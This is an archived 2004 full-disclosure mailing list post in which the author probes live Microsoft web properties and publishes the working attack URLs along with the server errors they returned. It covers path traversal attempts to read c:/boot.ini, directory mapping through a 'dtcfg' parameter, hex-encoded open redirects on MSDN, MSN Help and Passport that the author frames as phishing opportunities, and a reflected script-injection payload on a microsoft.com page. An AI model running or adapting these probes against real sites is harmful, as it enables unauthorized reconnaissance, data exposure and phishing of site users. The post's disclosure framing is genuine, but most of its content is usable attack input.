lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <19549786531.20040316034710@freemail.hu> From: vizzy at freemail.hu (Vizzy) Subject: [Bug Proofing Microsoft.com with Internet Explorer ** Part I **] ===[Bug Proofing Microsoft.com with Internet Explorer ]=== Disclaimer: All information contained here based on the author's wild imagination and all real coincidences are accidental. Provided for educational purposes only. Also, be aware that Microsoft site most likely won't explode (too good to be true, see Part II), your IE easily could. Introduction: So, where are we going today? All roads lead to www.microsoft.com, the powerful home of most secure operation system. Ever. But should THE SITE be the tightest one to demonstrate us the powerfull feeling of security and happines? Or is it Ok to have glitch or two unless someone notices? So -- who cares? The company, whos security profile is the security of their operation systems. Security of our homes (Hopefully we don't live in M$ boxes all of us). Ok, enough talking, let's see what we can phish with our handy browser.. Before we start, point your browsers to http://www.microsoft.com/isapi/gomscom.asp to remind yourself how Microsoft site looked like back in 1997, when Microsoft had no chances to hire some good web designers, because the most insecure and unstable but pretensions operation system was just going to be released.. =============[* Part I: Bogus URL's:]================================= ********* **URL 1** ********* Browsing MSDN I came across following URL: http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winsock/winsock/winsock_functions.asp Page uses frames and one of them contains "library/en-us/winsock/winsock/winsock_functions.asp" Ok, let's play with url a bit: http://msdn.microsoft.com/library/default.asp?url=/library/../library/en-us/winsock/winsock/winsock_functions.asp Returns us the same page. Same result. Can we change folders?.. Trying to guess parent folder name: http://msdn.microsoft.com/library/default.asp?url=/library/../../msdn/library/en-us/winsock/winsock/winsock_functions.asp > Page not found http://msdn.microsoft.com/library/default.asp?url=/library/../../wwwroot/library/en-us/winsock/winsock/winsock_functions.asp > Page not found Ok.. no luck.. but how about: http://msdn.microsoft.com/library/default.asp?url=/../c:/library/en-us/winsock/winsock/winsock_functions.asp > The system cannot find the file specified. Hmm.. http://msdn.microsoft.com/library/default.asp?url=/../c:/boot.ini > The system cannot find the file specified. This looks like Windows error message! Why? It's not here?:O I would be surprised if it was.. Tried some other default names but without luck. Let's leave this URL for now as I found better: ********* **URL 2** ********* http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg= let's play a bit with 'dtcfg' parameter: http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=.. > msxml3.dll error '80070005' > Access is denied. > /library/shared/deeptree/asp/contentbar.asp, line 12 Hmm.. Interesting. http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=" > Server.MapPath() error 'ASP 0173 : 80004005' > Invalid Path Character > /library/shared/deeptree/asp/contentbar.asp, line 12 > An invalid character was specified in the Path parameter for the MapPath method. Nice. So we control input for Server.MapPath() function, but what is it and what it does? Google answers: Function takes one argument, a virtual path, and returns the corresponding physical path. Right: http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=c:\ > Server.MapPath() error 'ASP 0172 : 80004005' > Invalid Path > /library/shared/deeptree/asp/contentbar.asp, line 12 > The Path parameter for the MapPath method must be a virtual path. A physical path was used. Just to be sure. Ok, our perspective? It looks like we dealing with something like: lala.ReadXml(Server.MapPath("$dtcfg")); http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\ > msxml3.dll error '80070005' > Access is denied. > /library/shared/deeptree/asp/contentbar.asp, line 12 http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\..\..\ > Microsoft JScript runtime error '800a138f' > 'oXDoc.documentElement' is null or not an object > /library/shared/deeptree/asp/contentbar.asp, line 40 http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\..\..\..\ > Server.MapPath() error 'ASP 0176 : 80004005' > Path Not Found > /library/shared/deeptree/asp/contentbar.asp, line 12 > The Path parameter for the MapPath method did not correspond to a known path. Looks like we are 5 levels deep from root directory. http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../http/library/shared/searchtab/cnfg.xml OK, leaving it.. ********* **URL 3** ********* http://www.microsoft.com/library/shared/searchtab/search.asp Sneaking into source: <FORM id="frmSearch2" target="_top" name="frmSearch2" action="/library/shared/searchtab/searchHandoff.asp" method="get"> <INPUT TYPE="HIDDEN" name="handoffurl" value="http://search.microsoft.com/us/dev/default.asp"> <INPUT TYPE="HIDDEN" name="stcfg" value="d:/http/library/shared/searchtab/cnfg.xml"> ^^^^^^ oops! So it looks like great site of Microsoft is hosted on drive D:! But -- lets try to verify that.. One of the known to us before pages.. With existed xml file name it is: http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/shared/searchtab/cnfg.xml Shows us nice skyblue screen. http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../library/shared/searchtab/cnfg.xml Ok, browsing works.. http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../http/library/shared/searchtab/cnfg.xml Works again! So it is indeed located in "HTTP" parent folder. To be 100% sure, let's try non-existent name and see what happens: http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../hxxp/library/shared/searchtab/cnfg.xml > Microsoft JScript runtime error '800a138f' > 'oXDoc.documentElement' is null or not an object > /library/shared/deeptree/asp/contentbar.asp, line 40 Yeah, our assumptions were right. /* As it appeared later, there are plenty places where physical path is exposed. Like: <INPUT TYPE="HIDDEN" name="stcfg" value="d:/http/mscorp/worldwide/spanish/msdn/cnfg.xml"> */ Now we can use this URL to probe folders in root web folder: http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/../http/help/ > Microsoft JScript runtime error '800a138f' > 'oXDoc.documentElement' is null or not an object > /library/shared/deeptree/asp/contentbar.asp, line 40 Folder does not exist. http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/../http/info/ > msxml3.dll error '80070005' > Access is denied. > /library/shared/deeptree/asp/contentbar.asp, line 12 Folder exist. .... etc http://www.microsoft.com/library/shared/searchtab/searchHandoff.asp?handoffurl=http://ddd.com/ddd.asp&stcfg=default.asp&qu=123&btnSearch=GO > strScopeId1 > sltSearchListundefined > Microsoft JScript runtime error '800a01a8' > Object required > /library/shared/searchtab/searchHandoff.asp, line 90 ********* **URL 4** ********* "Can anybody tell me where am I?" Are we at Microsoft.com or what? http://msdn.microsoft.com/vcsharp/default.aspx?pull=%68%74%74%70%3a%2f%2f%66%75%63%6b%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d http://help.msn.com/EN_US/external.asp?topic=%67%6f%6f%67%6c%65%2e%63%6f%6d I thought I downloaded security update from M$?! (R) Now, how about securely signing-up to your Passport? https://www.passport.net/cobrand2.asp?cbru=%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d Oh, well.. and last, but not least.. lets get some Javascript run on Microsoft site: http://www.microsoft.com/norge/news/archive.asp?y=1997%3Cscript%3Ealert('Its%20warmer%20in%20here..:)');%3C/script%3E%3C!-- *** with more critical bugs... to be continued in Part II: ....... -- have phun, Vizzy
Powered by blists - more mailing lists